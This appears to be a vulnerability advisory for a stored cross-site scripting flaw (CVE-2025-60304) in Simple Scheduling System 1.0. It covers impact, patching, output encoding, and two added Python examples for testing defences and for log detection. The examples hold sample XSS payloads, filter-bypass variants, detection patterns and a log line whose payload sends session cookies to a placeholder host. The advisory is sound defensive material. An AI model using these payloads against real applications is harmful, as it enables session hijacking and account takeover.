CVE-2025-60304

6.1 MEDIUM

📋 TL;DR

Simple Scheduling System 1.0 contains a stored XSS vulnerability in the Subject Description field: an attacker who can create or edit a scheduled item can store script in that field, and the application prints it back unencoded. When other users view scheduled items containing the malicious description, their browsers execute the attacker's code. This affects every user of Simple Scheduling System 1.0 who can view scheduled items.

💻 Affected Systems

Products:
  • Simple Scheduling System
Versions: 1.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: All installations of version 1.0 are vulnerable. The vulnerability exists in the core application code handling the Subject Description field.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, redirect users to malicious sites (including sites that attempt drive-by downloads), or perform actions in the application on behalf of authenticated users, including administrators.

🟠

Likely Case

Attackers will typically steal session cookies to hijack user accounts, potentially gaining administrative access to the scheduling system. Cookie theft only works if the session cookie is not flagged HttpOnly; if it is, the injected script can still issue authenticated requests from the victim's browser while the page is open.

🟢

If Mitigated

With proper output encoding at every place the field is displayed (and input validation as defence in depth), the stored payload is rendered as harmless text rather than executed as code.

🌐 Internet-Facing: HIGH - If the application is exposed to the internet, anyone who can obtain an account that creates or edits scheduled items can exploit this without needing access to the internal network.
🏢 Internal Only: MEDIUM - Internal attackers or compromised internal systems could still exploit this, but doing so requires network access to the application and an account that can edit scheduled items.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Exploitation requires the ability to create or modify scheduled items with malicious descriptions. This typically requires some level of access to the application.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.1 or later

Vendor Advisory: http://code-projects.com

Restart Required: No

Instructions:

1. Download the latest version from code-projects.com.
2. Back up your current installation.
3. Replace the vulnerable files with the patched version.
4. Verify the fix by testing XSS payloads in the Subject Description field.

🔧 Temporary Workarounds

Input Validation Filter

Applies to: all

Implement server-side validation of the Subject Description field (length limits, rejection of `<`, `>` and known script patterns) as defence in depth. Do not rely on it alone: filters that strip `<script>` tags are routinely bypassed with event-handler attributes, nested tags or encoded input.

Implement the check in the PHP code that receives Subject Description submissions, before the value is written to the database.

Output Encoding

Applies to: all

Apply HTML encoding at every point where Subject Description content is displayed, matching the context it is printed into (element body or attribute value).

Use htmlspecialchars($value, ENT_QUOTES, 'UTF-8') or an equivalent when outputting Subject Description data. This is the change that neutralises payloads already stored in the database.
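The following is an added example, not code from Simple Scheduling System or code-projects.com, showing why the two workarounds above are not interchangeable. It runs a deliberately weak "strip the script tag" input filter and proper output encoding (html.escape with quote=True, the Python equivalent of htmlspecialchars($s, ENT_QUOTES, 'UTF-8')) against constructed payloads, then parses the rendered HTML to see which tags a browser would actually receive. The templates, the parameter name subject_description and the sample payloads are assumptions for the example.

```python
"""Added example: why output encoding, not input filtering, fixes stored XSS."""
import html
import re
from html.parser import HTMLParser

# Constructed test inputs (not from the advisory). The first is benign, the
# second is the advisory's own test payload, the rest are variants that a
# filter looking only for <script> tags will miss.
SAMPLE_DESCRIPTIONS = [
    "Weekly sync with the network team",
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert(document.cookie)>",
    "<scr<script>ipt>alert(1)</scr</script>ipt>",
    '" onmouseover="alert(1)',
]


def naive_filter(description: str) -> str:
    """A 'strip <script> tags' input filter, deliberately weak: the kind of
    server-side sanitisation that is often offered as the only fix."""
    return re.sub(r"<\s*/?\s*script[^>]*>", "", description, flags=re.IGNORECASE)


def encode_for_html(description: str) -> str:
    """Output encoding at render time. html.escape(..., quote=True) escapes
    & < > " ' exactly like PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8')."""
    return html.escape(description, quote=True)


# Hypothetical templates for the two places a schedule page would print the
# description: as element text (list view) and inside an attribute (edit form).
def render_cell(description: str) -> str:
    return f"<td>{description}</td>"


def render_input(description: str) -> str:
    return f'<input type="text" name="subject_description" value="{description}">'


class TagCollector(HTMLParser):
    """Records every start tag and its attribute names: what a browser would
    treat as markup rather than as text."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append((tag, [name for name, _ in attrs]))


def injected_markup(page_html: str, expected: list) -> list:
    """Tags/attribute sets present in the rendered page that the template
    itself did not emit. An empty list means the browser sees only text."""
    parser = TagCollector()
    parser.feed(page_html)
    parser.close()
    return [t for t in parser.tags if t not in expected]


CELL_EXPECTED = [("td", [])]
INPUT_EXPECTED = [("input", ["type", "name", "value"])]


def evaluate(description: str) -> dict:
    """Compare both defences in both rendering contexts."""
    filtered, encoded = naive_filter(description), encode_for_html(description)
    return {
        "filter_cell": injected_markup(render_cell(filtered), CELL_EXPECTED),
        "filter_input": injected_markup(render_input(filtered), INPUT_EXPECTED),
        "encode_cell": injected_markup(render_cell(encoded), CELL_EXPECTED),
        "encode_input": injected_markup(render_input(encoded), INPUT_EXPECTED),
    }


if __name__ == "__main__":
    for d in SAMPLE_DESCRIPTIONS:
        print(repr(d))
        for context, leaked in evaluate(d).items():
            print(f"  {context:13} {'CLEAN' if not leaked else leaked}")
```

Two things to notice when it runs: the advisory's own `<script>alert('XSS')</script>` payload is neutralised by the weak filter as well, so testing with that payload alone cannot tell the two workarounds apart; and the attribute-breakout payload only becomes markup in the edit-form context, which is why verification has to cover every place the field is printed, not just the list view.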

🧯 If You Can't Patch

  • Place a web application firewall (WAF) with XSS protection rules in front of the application; treat it as a stopgap, since signature-based filters are bypassable
  • Restrict access to the scheduling system, and in particular the ability to create or edit scheduled items, to trusted users only
  • Set the HttpOnly flag on the application's session cookie so an injected script cannot read it directly

🔍 How to Verify

Check if Vulnerable:

Test on a non-production copy by entering <script>alert('XSS')</script> in the Subject Description field and checking whether it executes when the item is viewed. Also try a payload without a script tag, such as <img src=x onerror=alert(1)>, and check the edit form as well as the list view, since a filter that only strips <script> tags will pass the first test and fail the second.

Check Version:

Check the application's version information in the admin panel or about page

Verify Fix Applied:

After patching, test the same XSS payloads and verify that each is displayed as plain text rather than executed, in every view that prints the Subject Description field

📡 Detection & Monitoring

Log Indicators:

  • HTML tags, event-handler attributes or URL-encoded equivalents (for example %3Cscript%3E) in Subject Description submissions
  • Use of an existing session from a new IP address or user agent shortly after that user viewed a schedule, which can indicate a hijacked session

Network Indicators:

  • Outbound connections to suspicious domains from user browsers after viewing schedules

SIEM Query:

search 'Subject Description' AND ('<script>' OR 'javascript:' OR 'onload=' OR 'onerror=')

The query above is illustrative pseudo-syntax. Run it case-insensitively against the URL-decoded request body or the stored field value; submissions are normally percent-encoded in access logs, so a literal match on '<script>' will miss them.
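As an added example (not code from the advisory or from the product), the script below applies the idea behind the SIEM query to constructed log lines. It contrasts a literal substring match on the raw line with a case-insensitive pattern applied to the URL-decoded field value. The log format, the endpoint /save_schedule.php, the parameter name subject_description and all the log entries are assumptions made up for the example.

```python
"""Added example: detecting stored-XSS submissions in application logs."""
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed log lines (not from any real deployment). Assumed format:
# "<timestamp> <client ip> <user> <method> <path> <form body or ->".
SAMPLE_LOG = """\
2025-10-01T09:12:03Z 10.0.0.5 alice POST /save_schedule.php subject_description=Weekly+sync&room=B2
2025-10-01T09:15:44Z 10.0.0.9 mallory POST /save_schedule.php subject_description=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&room=B2
2025-10-01T09:16:10Z 10.0.0.9 mallory POST /save_schedule.php subject_description=%3Cimg+src%3Dx+onerror%3Dfetch%28%27https%3A%2F%2Fexample.invalid%2F%3F%27%2Bdocument.cookie%29%3E&room=C1
2025-10-01T09:20:00Z 10.0.0.7 bob POST /save_schedule.php subject_description=%3CScRiPt%3Ealert%281%29%3C%2FScRiPt%3E&room=A1
2025-10-01T09:25:31Z 10.0.0.5 alice GET /view_schedule.php?id=42 -
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) (?P<method>\S+) (?P<path>\S+) (?P<body>\S+)$"
)

# The literals from the SIEM query, matched against the raw (still encoded) line.
NAIVE_LITERALS = ["<script>", "javascript:", "onload=", "onerror="]

# Broader, case-insensitive pattern applied to the decoded field value.
# The event-handler clause (\bon[a-z]+\s*=) can false-positive on ordinary
# words such as "once=", so tune it against your own data.
XSS_PATTERN = re.compile(
    r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=|<\s*(?:iframe|svg|img|object|embed)\b",
    re.IGNORECASE,
)


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into fields and URL-decode the form body."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = (
        {k: v[0] for k, v in parse_qs(rec["body"], keep_blank_values=True).items()}
        if rec["body"] != "-" else {}
    )
    return rec


def naive_hits(log_text: str) -> list:
    """What the literal SIEM query would return: substring match on the raw line."""
    return [ln for ln in log_text.splitlines() if any(lit in ln for lit in NAIVE_LITERALS)]


def decoded_hits(log_text: str) -> list:
    """(timestamp, ip, user, decoded description) for every suspicious submission."""
    hits = []
    for ln in log_text.splitlines():
        rec = parse_line(ln)
        if rec is None or rec["method"] != "POST":
            continue
        desc = rec["params"].get("subject_description", "")
        if XSS_PATTERN.search(desc):
            hits.append((rec["ts"], rec["ip"], rec["user"], desc))
    return hits


if __name__ == "__main__":
    print("raw-literal matches:", len(naive_hits(SAMPLE_LOG)))
    for ts, ip, user, desc in decoded_hits(SAMPLE_LOG):
        print(ts, ip, user, repr(desc))
```

Against the sample log the literal query finds nothing, because browsers percent-encode form bodies, while the decoded match flags all three injection attempts, including the mixed-case `<ScRiPt>` and the `<img onerror>` variant that never contains the string "<script>" at all. The same decode-then-match step is what a real SIEM rule needs, whether that is done by the log pipeline or in the query itself.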
